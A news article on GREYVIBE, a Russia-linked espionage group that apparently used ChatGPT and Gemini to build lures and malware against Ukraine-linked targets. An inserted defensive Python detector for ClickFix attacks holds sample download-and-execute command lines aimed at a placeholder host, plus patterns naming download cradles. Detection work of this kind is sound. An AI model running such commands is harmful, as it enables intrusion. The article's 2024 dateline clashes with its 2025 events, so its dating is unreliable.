Tuesday, 02 January 2024 12:17 GMT

AI Raises GREYVIBE Threat Against Ukraine


(MENAFN- The Arabian Post) Russia-linked cyber operators tracked as GREYVIBE have used generative artificial intelligence tools including ChatGPT and Google Gemini to widen cyber-espionage operations against Ukraine-linked targets, signalling a shift in how lower-skilled threat groups can build lures, malware and infrastructure at speed.

The campaign, observed since at least August 2025, has targeted military, government, civilian and business-related organisations through phishing emails, fake verification pages, fraudulent websites and custom malware. The operators are assessed to be Russian-speaking, working largely within Moscow time, and focused on intelligence-gathering objectives tied to the war in Ukraine. Investigators have not linked the group definitively to a previously known hacking unit, leaving its exact command structure unclear.

GREYVIBE's significance lies less in elite technical capability than in its operational model. The group appears to have used large language models across several phases of its campaigns, from creating deceptive content and lure websites to developing obfuscators, loaders, backend infrastructure and post-compromise scripts. That pattern points to AI being embedded in the workflow rather than used as a one-off experiment.

The group has deployed several attack chains. One, known as PhantomMail, used spear-phishing emails containing links to malicious ZIP or RAR archives hosted on file-sharing services. Victims who opened the files saw decoy documents or error messages while malware executed in the background. Lures impersonated Ukraine-linked public bodies and critical sectors, including emergency, energy and communications entities.

Another route, PhantomClick, used fake CAPTCHA and ClickFix-style pages disguised as Zoom or civil-society websites. Victims were instructed in Ukrainian to run commands under the pretext of completing a Cloudflare-style security check, a tactic designed to make users infect their own systems while believing they were passing a routine verification step.
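One defensive check for the ClickFix pattern described above, added here as an example that is not part of the article or of any tooling it names: because the victim pastes the command into the Windows Run dialog, the resulting interpreter process has explorer.exe as its parent and typically carries hidden-window, encoded-command or download-and-execute flags. The process-creation events below are constructed samples in Sysmon-style fields.

```python
import re

# Constructed sample process-creation events (not from the article).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -NoProfile -c "iwr https://example.invalid/check|iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    # Benign: a user opening an interactive console from the Run dialog.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile"},
    # Benign: a scheduled script launched by a service host, not by the user.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

# Interpreters a pasted ClickFix command is usually run through.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe",
                "mshta.exe", "wscript.exe", "cscript.exe")

# Command-line traits that distinguish a pasted payload from ordinary use.
SUSPICIOUS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(r"(iwr|invoke-webrequest|curl|wget|downloadstring|mshta\s+https?://)", re.I)),
    ("inline_exec", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
]


def classify(event):
    """Return a finding for a ClickFix-like launch, or None for anything else."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS:
        return None
    # Run dialog launches are children of the shell (explorer.exe).
    from_run_dialog = event["parent"].lower().endswith("\\explorer.exe")
    hits = [name for name, rx in SUSPICIOUS if rx.search(event["cmdline"])]
    if from_run_dialog and hits:
        return {"verdict": "clickfix_suspect", "indicators": hits}
    return None


def scan(events):
    """Index and finding for every event that classify() flags."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

The parent-process condition is what keeps an interactive console or a service-launched script out of the alert; tune the interpreter list to the hosts you monitor.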


GREYVIBE also ran a campaign using fraudulent adult-club websites aimed at Ukraine-linked users. These sites delivered FallSpy Android spyware and Windows malware known as PhantomRelay and LegionRelay. Later versions added live-call features capable of capturing audio and video through WebRTC. Separate fake charity websites themed around drones and support for Ukraine's armed forces shared infrastructure and tooling with the adult-club campaign, suggesting coordination across different lures.

The malware family used by GREYVIBE shows both ambition and uneven tradecraft. PhantomRelay is a PowerShell-based remote access tool that profiles infected machines and allows operators to run scripts and Windows commands. LegionRelay supports file enumeration, exfiltration, screenshots, browser data theft, Telegram and WhatsApp data collection and remote desktop setup. Several obfuscators and loaders associated with the group appear to have been developed with AI assistance.

Operational mistakes have shaped the assessment of GREYVIBE as a low-to-moderately sophisticated group. Indicators include design flaws in LegionRelay, development samples uploaded to public malware-scanning platforms, inconsistent operational security and traces suggesting links to the wider cybercrime ecosystem. The same PhantomRelay-related tooling has appeared in activity clusters beyond GREYVIBE, raising the possibility that the group includes current or former cybercriminal actors rather than a conventional state unit.

The Russia connection rests on a combination of language, timing, targets and objectives. Russian-language comments and administrative panels appeared in malware and backend artefacts. Operator machines were configured with a Russian locale and the UTC+3 time zone. Activity patterns matched Moscow working hours. The target set and intelligence-gathering focus aligned closely with Russian state interests, though investigators stopped short of classifying GREYVIBE as a confirmed state agency operation.


The use of ChatGPT, Google Gemini and image-generation platforms shows how generative AI is changing the economics of cyber operations. Attackers can generate polished phishing material, build credible websites, translate or localise content, create scripts, troubleshoot code and refactor malware faster than before. This does not remove the need for technical knowledge, but it lowers the barrier for groups that lack deep in-house engineering skills.

For defenders, the case adds pressure to rethink detection methods that rely heavily on stable malware signatures or repeated infrastructure patterns. AI-assisted actors can rewrite code, refresh lures and alter components more frequently, making old clustering techniques less dependable. Attribution becomes harder when malware families are generated, modified or shared across criminal and state-aligned ecosystems.

GREYVIBE's campaigns also show how Ukraine remains a testing ground for cyber tactics that may later spread elsewhere. Mid-sized organisations, charities, civil-society groups and companies linked to geopolitically sensitive sectors face rising risk from actors that can scale deception without large technical teams. The same methods used against Ukraine-linked targets could be adapted for election interference, corporate espionage, sanctions evasion, financial theft or influence operations.




The Arabian Post
